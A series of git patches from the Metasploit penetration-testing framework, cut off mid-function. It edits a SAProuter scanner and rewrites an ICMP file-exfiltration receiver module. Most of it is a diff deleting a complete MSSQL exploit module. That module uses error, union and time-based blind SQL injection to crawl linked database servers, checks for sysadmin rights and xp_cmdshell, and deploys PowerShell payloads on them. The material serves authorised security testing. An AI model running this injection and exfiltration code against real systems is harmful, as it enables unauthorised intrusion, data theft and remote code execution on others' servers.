print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + + print_status() + print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " + + "to #{datastore['MODE']}") + results = service_change_startup(datastore['QSERVICE'],datastore['MODE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + print_status("Current status of this service " + + "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab + + print_status() + print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}") + results = service_start(datastore['SSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + print_status("Current status of this service " + + "#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab + print_status("Sleeping to give the service a chance to start") + select(nil, nil, nil, 2) # give the service time to start, reduces false negatives + + print_status() + print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}") + results = service_stop(datastore['SSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + print_status("Current status of this service " + + "#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab + + print_status() + print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}") + results = service_delete(datastore['NSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + print_status("Current status of this service " + + "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab + print_status() + print_status("Testing complete.") + end +=end + +end From 99d145eb233d4444f4dc1b69917610abf19cb06e Mon Sep 17 00:00:00 2001 From: nmonkee Date: Wed, 14 Nov 2012 23:50:47 +0000 Subject: [PATCH 012/154] made requested changes --- .../scanner/sap/sap_router_info_request.rb | 33 +++++++++---------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index f0ef4c2310..6d1c687aaa 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -6,13 +6,13 @@ ## ## -# This module is based on, inspired by, or is a port of a plugin available in -# the Onapsis Bizploit Opensource ERP Penetration Testing framework - +# This module is based on, inspired by, or is a port of a plugin available in +# the Onapsis Bizploit Opensource ERP Penetration Testing framework - # http://www.onapsis.com/research-free-solutions.php. -# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts +# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts # in producing the Metasploit modules and was happy to share his knowledge and -# experience - a very cool guy. I'd also like to thank Chris John Riley, -# Ian de Villiers and Joris van de Vis who have Beta tested the modules and +# experience - a very cool guy. I'd also like to thank Chris John Riley, +# Ian de Villiers and Joris van de Vis who have Beta tested the modules and # provided excellent feedback. Some people just seem to enjoy hacking SAP :) ## @@ -23,16 +23,15 @@ class Metasploit4 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Tcp - + def initialize super( 'Name' => 'SAPRouter Admin Request', - 'Version' => '$Revision$', 'Description' => %q{ SAPRouter Admin Request (display remote route information). http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm }, - 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], + 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]], 'Author' => [ 'nmonkee' ], 'License' => BSD_LICENSE ) @@ -41,10 +40,10 @@ class Metasploit4 < Msf::Auxiliary Opt::RPORT(3299) ], self.class) end - + def get_data(size, packet_len) info = '' - for i in 1..size + 1.upto(size) do |i| data = sock.recv(1) packet_len -= 1 if data == "\x00" @@ -52,12 +51,12 @@ class Metasploit4 < Msf::Auxiliary packet_len -= size - i return info, packet_len break - elsif + else info << data end end end - + def run_host(ip) type = 'ROUTER_ADM' version = 0x26 @@ -86,15 +85,15 @@ class Metasploit4 < Msf::Auxiliary connect rescue ::Rex::ConnectionRefused print_status("#{ip}:#{datastore['RPORT']} - connection refused") - connected == 'false' + connected = false rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error print_status("#{ip}:#{datastore['RPORT']} - connection timeout") - connected == 'false' + connected = false rescue ::Exception => e print_error("#{ip}:#{datastore['RPORT']} - exception #{e.class} #{e} #{e.backtrace}") - connected == 'false' + connected = false end - if connected != 'false' + if connected != false print_good("connected to saprouter") print_good("sending ROUTER_ADM packet info request") sock.put(ni_packet) @@ -113,7 +112,7 @@ class Metasploit4 < Msf::Auxiliary sock.recv(2) packet_len -= 2 saptbl << [source, destination, service] - while packet_len !=0 + while packet_len > 0 sock.recv(13) packet_len -= 13 source, packet_len = get_data(46,packet_len) From 082bba33425a9339b530a6d4498cb28b06a55657 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Mon, 19 Nov 2012 16:02:53 +0100 Subject: [PATCH 013/154] Rewrite Removed unrequired global vars Added flexibility in start, continue, end responses Added ability to set filename in BOF packet or not Fixed BEGIN RESCUE blocks to not catch errors themselves BEGIN ENSURE block still needed to trigger save to loot on CTRL+C --- modules/auxiliary/server/icmp_exfil.rb | 215 +++++++++++++------------ 1 file changed, 113 insertions(+), 102 deletions(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index a5963343d8..83c4038405 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -18,39 +18,41 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'ICMP Exfiltration', - 'Version' => '$Revision$', - 'Description' => %q{ + 'Name' => 'ICMP Exfiltration Service', + 'Description' => %q{ This module is designed to provide a server-side component to receive and store files - exfiltrated over ICMP. + exfiltrated over ICMP echo request packets. To use this module you will need to send an initial ICMP echo request containing the - specified trigger (defaults to '^BOF:') followed by the filename being sent. All data - received from this source will automatically be added to the receive buffer until an - ICMP echo request containing a specific end command (defaults to 'EOL') is received. + specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or + a random filename can be assisnged). All data received from this source will automatically + be added to the receive buffer until an ICMP echo request containing a specific end trigger + (defaults to 'EOL') is received. }, - 'Author' => 'Chris John Riley', - 'License' => MSF_LICENSE, - 'References' => + 'Author' => 'Chris John Riley', + 'License' => MSF_LICENSE, + 'References' => [ - # general - ['URL', 'http://blog.c22.cc'], # packetfu ['URL','http://code.google.com/p/packetfu/'] ] ) register_options([ - OptString.new('START_TRIGGER', [true, 'Trigger to listen for (followed by filename)', '^BOF:']), - OptString.new('END_TRIGGER', [true, 'End of File command', '^EOF']), - OptString.new('RESPONSE', [true, 'Data to respond when initial trigger matches', 'BEGIN']), - OptString.new('BPF_FILTER', [true, 'BFP format filter to listen for', 'icmp']), - OptString.new('INTERFACE', [false, 'The name of the interface']), + OptString.new('START_TRIGGER', [true, 'Trigger for beginning of file', '^BOF']), + OptString.new('END_TRIGGER', [true, 'Trigger for end of file', '^EOF']), + OptString.new('RESP_START', [true, 'Data to respond when initial trigger matches', 'SEND']), + OptString.new('RESP_CONT', [true, 'Data ro resond when continuation of data expected', 'OK']), + OptString.new('RESP_END', [true, 'Data to response when EOF received and data saved', 'COMPLETE']), + OptString.new('BPF_FILTER', [true, 'BFP format filter to listen for', 'icmp']), + OptString.new('INTERFACE', [false, 'The name of the interface']), + OptBool.new('FNAME_IN_PACKET', [true, 'Filename presented in first packet straight after START_TRIGGER', true]) ], self.class) register_advanced_options([ - OptString.new('CLOAK', [false, 'Create the response packet using a specific OS fingerprint (windows, linux, freebsd)', 'linux']), - OptBool.new('PROMISC', [false, 'Enable/Disable promiscuous mode', false]), + OptEnum.new('CLOAK', [true, 'OS fingerprint to use for packet creation', 'linux', ['windows', 'linux', 'freebsd']]), + OptBool.new('PROMISC', [true, 'Enable/Disable promiscuous mode', false]), + OptAddress.new('LOCALIP', [false, 'The IP address of the local interface']) ], self.class) deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT') @@ -58,54 +60,67 @@ class Metasploit3 < Msf::Auxiliary def run begin + #Check Pcaprub is up to date + if not netifaces_implemented? + print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available") + netifaces = false + else + netifaces = true + end + @interface = datastore['INTERFACE'] || Pcap.lookupdev + #This is needed on windows cause we send interface directly to Pcap functions @interface = get_interface_guid(@interface) - @iface_ip = Pcap.lookupaddrs(@interface)[0] - - @filter = datastore['BPF_FILTER'] - @eoftrigger = datastore['END_TRIGGER'] - @boftrigger = datastore['START_TRIGGER'] - @response = datastore['RESPONSE'] - @promisc = datastore['PROMISC'] || false - @cloak = datastore['CLOAK'].downcase || 'linux' + @iface_ip = datastore['LOCALIP'] + @iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces + raise "Interface IP is not defined and can not be guessed" unless @iface_ip + # start with blank slate @record = false + @record_data = '' - if @promisc + if datastore['PROMISC'] print_status("Warning: Promiscuous mode enabled. This may cause issues!") end - # start listner + # start icmp listener process - loop icmplistener - rescue => ex - print_error(ex.message) ensure storefile - print_status("Stopping ICMP listener on %s (%s)" % [@interface, @iface_ip]) + print_status("\nStopping ICMP listener on #{@interface} (#{@iface_ip})") end end def icmplistener # start icmp listener - print_good("ICMP Listener started on %s (%s). Monitoring for trigger packet containing %s" % [@interface, @iface_ip, @boftrigger]) - cap = PacketFu::Capture.new(:iface => @interface, :start => true, :filter => @filter, :promisc => @promisc) + print_status("ICMP Listener started on #{@interface} (#{@iface_ip}). Monitoring for trigger packet containing #{datastore['START_TRIGGER']}") + if datastore['FNAME_IN_PACKET'] + print_status("Filename expected in initial packet, directly following trigger (e.g. #{datastore['START_TRIGGER']}filename.ext)") + end + + cap = PacketFu::Capture.new( + :iface => @interface, + :start => true, + :filter => datastore['BPF_FILTER'], + :promisc => datastore['PROMISC'] + ) loop { - cap.stream.each do |pkt| + cap.stream.each do | pkt | packet = PacketFu::Packet.parse(pkt) data = packet.payload[4..-1] - if packet.is_icmp? and data =~ /#{@boftrigger}/ - - print_status("#{Time.now}: SRC:%s ICMP (type %d code %d) DST:%s" % [packet.ip_saddr, packet.icmp_type, packet.icmp_code, packet.ip_daddr]) + if packet.is_icmp? and data =~ /#{datastore['START_TRIGGER']}/ + # start of new file detected + vprint_status("#{Time.now}: ICMP (type %d code %d) SRC:%s DST:%s" % + [packet.icmp_type, packet.icmp_code, packet.ip_saddr, packet.ip_daddr]) # detect and warn if system is responding to ICMP echo requests # suggested fixes: - # - # (linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all - # (Windows) netsh firewall set icmpsetting 8 disable - # (Windows cont.) netsh firewall set opmode mode = ENABLE + # -(linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all + # -(Windows) netsh firewall set icmpsetting 8 disable + # -(Windows) netsh firewall set opmode mode = ENABLE if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip raise RuntimeError , "Dectected ICMP echo response. Disable OS ICMP handling!" @@ -116,63 +131,67 @@ class Metasploit3 < Msf::Auxiliary storefile end - @p_icmp = packet - # begin recording stream @record = true @record_host = packet.ip_saddr @record_data = '' - @filename = data[(@boftrigger.length-1)..-1].strip # set filename from icmp payload - print_good("Beginning capture of %s data" % @filename) + # set filename in packet or set random value + if datastore['FNAME_IN_PACKET'] + @filename = data[((datastore['START_TRIGGER'].length)-1)..-1].strip # set filename from icmp payload + else + @filename = "icmp_exfil_" + ::Time.now.to_i # set random filename + end + + print_good("Beginning capture of \"#{@filename}\" data") # create response packet icmp_pkt - icmp_packet + icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) - if not @icmp_response + if not icmp_response raise RuntimeError ,"Could not build ICMP resonse" else # send response packet icmp_pkt - send_icmp + send_icmp(icmp_response, contents) end - break elsif packet.is_icmp? and @record and @record_host == packet.ip_saddr - # check for EOF marker, if not continue recording + # check for EOF marker, if not continue recording data - if data =~ /#{@eoftrigger}/ - print_status("%d bytes of data recevied in total" % @record_data.length) - print_good("End of File received. Saving %s to loot" % @filename) + if data =~ /#{datastore['END_TRIGGER']}/ + # end of file marker found + print_status("#{@record_data.length} bytes of data recevied in total") + print_good("End of File received. Saving \"#{@filename}\" to loot") storefile - @p_icmp = packet # create response packet icmp_pkt - icmp_packet + icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) - if not @icmp_response + if not icmp_response raise RuntimeError , "Could not build ICMP resonse" else # send response packet icmp_pkt - send_icmp + send_icmp(icmp_response, contents) end # turn off recording and clear status @record = false @record_host = '' @record_data = '' + else + # add data to recording and continue @record_data << data.to_s() - print_status("Received %s bytes of data from %s" % [data.length, packet.ip_saddr]) - @p_icmp = packet + vprint_status("Received #{data.length} bytes of data from #{packet.ip_saddr}") # create response packet icmp_pkt - icmp_packet + icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) - if not @icmp_response + if not icmp_response raise RuntimeError , "Could not build ICMP resonse" else # send response packet icmp_pkt - send_icmp + send_icmp(icmp_response, contents) end end end @@ -180,52 +199,43 @@ class Metasploit3 < Msf::Auxiliary } end - def icmp_packet + def icmp_packet(packet, contents) # create icmp response - begin + @src_ip = packet.ip_daddr + src_mac = packet.eth_daddr + @dst_ip = packet.ip_saddr + dst_mac = packet.eth_saddr + icmp_id = packet.payload[0,2] + icmp_seq = packet.payload[2,2] - @src_ip = @p_icmp.ip_daddr - @src_mac = @p_icmp.eth_daddr - @dst_ip = @p_icmp.ip_saddr - @dst_mac = @p_icmp.eth_saddr - @icmp_id = @p_icmp.payload[0,2] - @icmp_seq = @p_icmp.payload[2,2] - # create payload with matching id/seq - @resp_payload = @icmp_id + @icmp_seq + @response + # create payload with matching id/seq + resp_payload = icmp_id + icmp_seq + contents - icmp_pkt = PacketFu::ICMPPacket.new(:flavor => @cloak) - icmp_pkt.eth_saddr = @src_mac - icmp_pkt.eth_daddr = @dst_mac - icmp_pkt.icmp_type = 0 - icmp_pkt.icmp_code = 0 - icmp_pkt.payload = @resp_payload - icmp_pkt.ip_saddr = @src_ip - icmp_pkt.ip_daddr = @dst_ip - icmp_pkt.recalc - @icmp_response = icmp_pkt - rescue => ex - print_error(ex.message) - end + icmp_pkt = PacketFu::ICMPPacket.new(:flavor => datastore['CLOAK'].downcase) + icmp_pkt.eth_saddr = src_mac + icmp_pkt.eth_daddr = dst_mac + icmp_pkt.icmp_type = 0 + icmp_pkt.icmp_code = 0 + icmp_pkt.payload = resp_payload + icmp_pkt.ip_saddr = @src_ip + icmp_pkt.ip_daddr = @dst_ip + icmp_pkt.recalc + + icmp_response = icmp_pkt + + return icmp_response, contents end - def send_icmp - # send icmp response - - begin - @icmp_response.to_w(iface = @interface) - if datastore['VERBOSE'] - print_good("Response sent to %s containing %d bytes of data" % [@dst_ip, @response.length]) - end - rescue => ex - print_error(ex.message) - end + def send_icmp(icmp_response, contents) + # send icmp response on selected interface + icmp_response.to_w(iface = @interface) + vprint_good("Response sent to #{@dst_ip} containing response trigger : \"#{contents}\"") end def storefile - # store the file - - if not @record_data.length == 0 + # store the file in loot if data is present + if @record_data and not @record_data.empty? loot = store_loot( "icmp_exfil", "text/xml", @@ -234,7 +244,8 @@ class Metasploit3 < Msf::Auxiliary @filename, "ICMP Exfiltrated Data" ) - print_good("Incoming file %s saved to loot" % @filename) - print_good("Loot filename: %s" % loot) + print_good("Incoming file \"#{@filename}\" saved to loot") + print_good("Loot filename: #{loot}") + end end end \ No newline at end of file From 430227a4608dc3937485c733d6616227e74a7807 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Mon, 19 Nov 2012 16:04:35 +0100 Subject: [PATCH 014/154] msftidy cleanup --- modules/auxiliary/server/icmp_exfil.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 83c4038405..680b4556a4 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary To use this module you will need to send an initial ICMP echo request containing the specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or - a random filename can be assisnged). All data received from this source will automatically + a random filename can be assisnged). All data received from this source will automatically be added to the receive buffer until an ICMP echo request containing a specific end trigger (defaults to 'EOL') is received. }, @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary @record_data = '' if datastore['PROMISC'] - print_status("Warning: Promiscuous mode enabled. This may cause issues!") + print_status("Warning: Promiscuous mode enabled. This may cause issues!") end # start icmp listener process - loop @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary if packet.is_icmp? and data =~ /#{datastore['START_TRIGGER']}/ # start of new file detected - vprint_status("#{Time.now}: ICMP (type %d code %d) SRC:%s DST:%s" % + vprint_status("#{Time.now}: ICMP (type %d code %d) SRC:%s DST:%s" % [packet.icmp_type, packet.icmp_code, packet.ip_saddr, packet.ip_daddr]) # detect and warn if system is responding to ICMP echo requests From dc93bd72157b14fd81752f13bd03f9e229d623c1 Mon Sep 17 00:00:00 2001 From: nullbind Date: Mon, 19 Nov 2012 14:27:08 -0600 Subject: [PATCH 015/154] removed redundant file --- .../windows/mssql/mssql_linkcrawler_sqli.rb | 568 ------------------ 1 file changed, 568 deletions(-) delete mode 100644 modules/exploits/windows/mssql/mssql_linkcrawler_sqli.rb diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler_sqli.rb b/modules/exploits/windows/mssql/mssql_linkcrawler_sqli.rb deleted file mode 100644 index 93264736aa..0000000000 --- a/modules/exploits/windows/mssql/mssql_linkcrawler_sqli.rb +++ /dev/null @@ -1,568 +0,0 @@ -require 'msf/core' -require 'msf/core/exploit/mssql_commands' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::Remote::MSSQL_SQLI - include Msf::Auxiliary::Report - include Msf::Exploit::CmdStagerVBS - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft SQL Server - Database Link Crawler', - 'Description' => %q{ - When provided with a valid SQLi URL, this module will crawl SQL Server database links and identify MSSQL links configured with sysadmin privileges. - - Syntax for injection URLs: - - Error: /account.asp?id=1+and+1=[SQLi];-- - - Union: /account.asp?id=1+union+all+select+null,[SQLi],null;-- - Union works most reliably if "id=1" does not return any data, i.e. use "id=12345678" - - Blind: /account.asp?id=1;[SQLi];-- - - The payload deployment works currently only on systems that have powershell. Powershell deployment code based on Matthew Graeber's research. - }, - 'Author' => - [ - 'Antti Rantasaari ', - 'Scott Sutherland "nullbind" ' - ], - 'Platform' => [ 'Windows' ], - 'License' => MSF_LICENSE, - 'References' => [[ 'URL', 'http://www.netspi.com/' ],['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'], - ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']], - 'Version' => '$Revision: 1 $', - 'DisclosureDate' => 'Jan 1 2000', - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0 - )) - - register_options( - [ - OptBool.new('VERBOSE', [false, 'Set how verbose the output should be', 'false']), - OptString.new('TYPE', [ true, 'SQLi type (ERROR,UNION, or BLIND)', 'ERROR']), - OptString.new('CHARSET', [true, 'Charset used for blind injections', 'default']), - OptString.new('DELAY', [true, 'Time delay for blind injections - 1-5 seconds', '1']), - OptBool.new('DEPLOY', [true, 'Deploy a payload on target systems', 'true']), - OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy payload to (blank = all)']) - ], self.class) - end - - def exploit - masterList = Array.new - masterList[0] = Hash.new # Define new hash - masterList[0]["name"] = "" # Name of the current database server - masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored - masterList[0]["done"] = 0 # Used to determine if linked need to be crawled - shelled = Array.new # keeping track of shelled systems to prevent multiple incoming sa links resulting in multiple shells on one system - - # Create table to store configuration information from crawled database server links - linked_server_table = Rex::Ui::Text::Table.new( - 'Header' => 'Linked Server Table', - 'Ident' => 1, - 'Columns' => ['db_server', 'link_path','link_priv','link_status'] - ) - save_loot = "" - - type = datastore['type'].to_s.downcase - - print_status("----------------------------------------------------") - print_status("Start time : #{Time.now}") - print_status("----------------------------------------------------") - print_status("Enumerating name of database server entry point") - print_status("----------------------------------------------------") - - ######################################## - # Going through each identified database - ######################################## - while masterList.any? {|f| f["done"] == 0} - server = masterList.detect {|f| f["done"] == 0} - if type=="error" or type=="union" - execute = "(select @@servername as int)" - sql = query_builder(server["path"].first,"",0,execute) - res = mssql_query(sql) - unless res == nil - name = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first - else - name = nil - end - elsif type=="blind" - column = "@@servername" - name = blind_injection(server["path"].first,'name',column) - end - - ################################################## - # Printing statuses - # Calling mssql_permission_checker for good servers (not broken links) - ################################################## - unless server["path"].first.first == nil - print("\n") if datastore['VERBOSE'] == true - print_status("----------------------------------------------------") - print_status("Enumerating server information #{masterList[0]["name"]} -> #{server["path"].first.join(" -> ")}") - print_status("----------------------------------------------------") - end - unless name == nil - server["name"] = name - print_status("Server information") - print_status(" o Server name: #{name}") - if server["path"].first.first != nil - print_status(" o Path: #{masterList[0]["name"]} -> #{server["path"].first.join(" -> ")}") - else - print_status(" o Path: NA") - end - privstatus = mssql_permission_checker(server,masterList,name,type,shelled) - badlink = 0 - else - print_error("Server information - bad link") - print_status(" o Server name: #{server["path"].first.last}") - print_status(" o Path: #{masterList[0]["name"]} -> #{server["path"].first.join(" -> ")}") - print_status(" o Privileges: NA") - badlink = 1 - end - - # Write Report and Display output to the screen - save_loot = "yes" - write_to_report(server["name"],server["path"],masterList[0]["name"],privstatus,badlink,linked_server_table) - - # Get number of good links on the server - count = nil - if type=="error" or type == "union" and name != nil - execute = "(select cast(count(srvname) as varchar) from master..sysservers where srvname != @@servername and dataaccess = 1 and srvproduct = 'SQL Server')" - sql = query_builder(server["path"].first,"",0,execute) - res = mssql_query(sql) - count = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first - elsif type=="blind" and name !=nil - column = "srvname" - if server["name"] != nil - count = blind_injection(server["path"].first,'linkcount',column) - end - end - - ########################### - # Crawling database links # - ########################### - if count != nil and count != 0 - print_status("") - print_status("Crawling linked servers on #{server["name"]}...") - print_status("Links found: #{count}") - (1..Integer(count)).each do |i| - name = nil - if type=="error" or type == "union" - execute = "select top 1 srvname from master..sysservers where srvname in (select top " + i.to_s + \ - " srvname from master..sysservers where srvname != @@servername and dataaccess = 1 \ - and srvproduct = 'SQL Server' order by srvname asc) order by srvname desc" - sql = query_builder(server["path"].first,"",0,execute) - res = mssql_query(sql) - name = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first - elsif type=="blind" - column = "srvname" - name = blind_injection(server["path"].first,'name',column,i.to_s) - end - print_status("Found a link to #{name}") - - if name != nil - unless masterList.any? {|f| f["name"] == name} - masterList << add_host(name,server["path"].first) - else - (0..masterList.length-1).each do |x| - if masterList[x]["name"] == name - masterList[x]["path"] << server["path"].first.dup - masterList[x]["path"].last << name - print_status("Alternative path to #{name}: #{masterList.first["name"]} -> #{server["path"].first.join(" -> ")} -> #{name}") - privstatus = mssql_permission_checker(server,masterList,name,type,shelled) - else - break - end - end - end - end - end - end - server["done"] = 1 - end - print_status("----------------------------------------------------") - print_status("End time : #{Time.now}") - print_status("----------------------------------------------------") - - # Setup table for loot - this_service = nil - if framework.db and framework.db.active - this_service = report_service( - :host => rhost, - :port => rport, - :name => 'mssql', - :proto => 'tcp' - ) - end - - # Write log to loot / file - if (save_loot=="yes") - filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv" - path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service) - print_status("Results have been saved to: #{path}") - end - end - - #------------------------------------------------------------------------------------- - # Method to check if xp_cmdshell accessible - if so, calls payload delivery method - #------------------------------------------------------------------------------------- - def mssql_permission_checker(server,masterList,name,type,shelled) - temppath = Array.new - server["path"].first.each {|j| temppath << j} - - unless temppath.last == name or server["path"].first.first == nil - temppath << name - end - - # Checking if sysadmin privileges on the server - sysadmin = "0" - if type == "error" or type == "union" - execute = "(select cast(is_srvrolemember('sysadmin') as varchar))" - sql = query_builder(temppath,"",0,execute) - res = mssql_query(sql) - sysadmin = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first - elsif type == "blind" - column = "sysadmin" - sysadmin = blind_injection(temppath,"enabled",column) - end - - # Checking if xp_cmdshell enabled - if sysadmin == "1" - print_status(" o Privileges: sysadmin") - xpcmdshell = "0" - if type == "error" or type == "union" - execute = "(select cast(value_in_use as varchar) FROM sys.configurations WHERE name = 'xp_cmdshell')" - sql = query_builder(temppath,"",0,execute) - res = mssql_query(sql) - xpcmdshell = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first - elsif type == "blind" - column = "xpcmdshell" - xpcmdshell = blind_injection(temppath,"enabled",column) - end - if xpcmdshell == "1" - if temppath[0] == nil - print_good(" o Xp_cmdshell enabled on #{masterList.first["name"]}") - else - print_good(" o Xp_cmdshell enabled on #{masterList.first["name"]} -> #{temppath.join(" -> ")}") - end - if type == "error" or type == "union" and temppath.first == nil - print_status("Attempting to deliver payload on first server #{name}") - print_status("This may fail depending on the injection point [SQLi] location") - print_status("If no shell, try mssql_payload_sqli module") - end - # Deploying a payload if no shells on system and DEPLOY = true - unless shelled.include?(name) - #Deploy to specific target if specified - if datastore['DEPLOYLIST']=="" - datastore['DEPLOYLIST'] = nil - end - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true - print_status("\t - Checking if #{name} is on the deploy list...") - end - if datastore['DEPLOYLIST'] != nil - deploylist = datastore['DEPLOYLIST'].upcase.split(',') - end - if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true - print_status("\t - #{name} is on the deploy list.") - end - if datastore['DEPLOY'] - powershell_upload_exec(temppath) - end - shelled << name - return 1 - else - print_status("\t - #{name} is NOT on the deploy list, moving on.") and datastore["VERBOSE"] == true - return 1 - end - else - if datastore['DEPLOY'] - print_status("Payload already deployed on #{name}") - return 1 - end - end - end - else - print_status(" o Privileges: user") - return 0 - end - end - #------------------------------------------------------------------------------------- - # Method for blind SQL injections - # Will fail if targeted server very slow - mssql_query function times out at 5 seconds - #------------------------------------------------------------------------------------- - def blind_injection(path,command,column,topcount=false) - delay = datastore['DELAY'] - if delay.to_i<1 or delay.to_i>5 - delay = 1 - end - if command=="name" - length = 0 - spot = 1 - name = "" - # checking if link works - if good, returns link name; if bad, returns nil - unless path.last == nil or column == "srvname" - execute = "select 1; if(select len((#{column})))>0 begin waitfor delay '0:0:#{delay}' end" - sql = query_builder(path,"",0,execute,true) - starttime = Time.now - mssql_query(sql) - if Time.now - starttime > delay.to_i - return path.last - else - return nil - end - end - # get the length of @@servername or linked server srvname - print(" Extracting #{column} value length: ") if datastore['VERBOSE'] == true - (1..100).each do |i| - if column == "@@servername" - execute = "select 1; if(select len((#{column})))=#{i.to_s} begin waitfor delay '0:0:#{delay}' end" - end - if column == "srvname" - execute = "select 1; if(select top 1 len(srvname) from master..sysservers where srvname in \ - (select top #{topcount} srvname from master..sysservers where srvname != @@servername and \ - dataaccess = 1 and srvproduct = 'SQL Server' order by srvname asc) order by srvname desc)='#{i.to_s}' \ - begin waitfor delay '0:0:#{delay}' end" - end - sql = query_builder(path,"",0,execute,true) - starttime = Time.now - mssql_query(sql) - if Time.now - starttime > delay.to_i - print("#{i}\n") if datastore['VERBOSE'] == true - length = i - break - end - end - - if length == 100 - return nil - end - # enumerate servername or linked server servername one character at a time - if datastore['CHARSET'] == 'default' - charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.\\/-_#!?*@$%&()" - elsif - charset = datastore['CHARSET'] - end - - spot = 1 - print(" Extracting #{column} value: ") if datastore['VERBOSE'] == true - - while spot <= length - charset.each_char do |i| - if column == "@@servername" - execute = "select 1; if(select substring(#{column},#{spot},1))='#{i}' begin waitfor delay '0:0:#{delay}' end" - end - if column == "srvname" - execute = "select 1; if(select top 1 substring(srvname,#{spot},1) from master..sysservers \ - where srvname in (select top #{topcount} srvname from master..sysservers where srvname \ - != @@servername and dataaccess = 1 and srvproduct = 'SQL Server' order by srvname asc) \ - order by srvname desc)='#{i}' begin waitfor delay '0:0:#{delay}' end" - end - sql = query_builder(path,"",0,execute,true) - starttime = Time.now - mssql_query(sql) - if Time.now - starttime > delay.to_i - spot = spot+1 - name = name + i - print("#{i}") if datastore['VERBOSE'] == true - break - end - if i == charset[-1] - print("\n") if datastore['VERBOSE'] == true - print_error("Failed to enumerated server name") - return nil - end - end - end - print("\n") if datastore['VERBOSE'] == true - return name - - # check how many linked servers on database server - elsif command=="linkcount" - (0..100).each do |i| - execute = "select 1; if(select count(srvname) from master..sysservers where srvname != @@servername and dataaccess = 1 \ - and srvproduct = 'SQL Server')=#{i} begin waitfor delay '0:0:#{delay}' end" - sql = query_builder(path,"",0,execute,true) - starttime = Time.now - mssql_query(sql) - if Time.now - starttime > delay.to_i - return i - end - end - return nil - - # check is sysadmin or xp_cmdshell enabled - elsif command=="enabled" - if column == "sysadmin" - execute = "select 1; if(select is_srvrolemember('sysadmin'))=1 begin waitfor delay '0:0:#{delay}' end" - end - if column == "xpcmdshell" - execute = "select 1; if(select cast(value_in_use as varchar) FROM sys.configurations WHERE name = 'xp_cmdshell')='1' \ - begin waitfor delay '0:0:#{delay}' end" - end - sql = query_builder(path,"",0,execute,true) - starttime = Time.now - mssql_query(sql) - if Time.now - starttime > delay.to_i - return "1" - end - return "0" - end - end - - #------------------------------------------------------------------------------------- - # Method that builds nested openquery statements using during crawling - #------------------------------------------------------------------------------------- - def 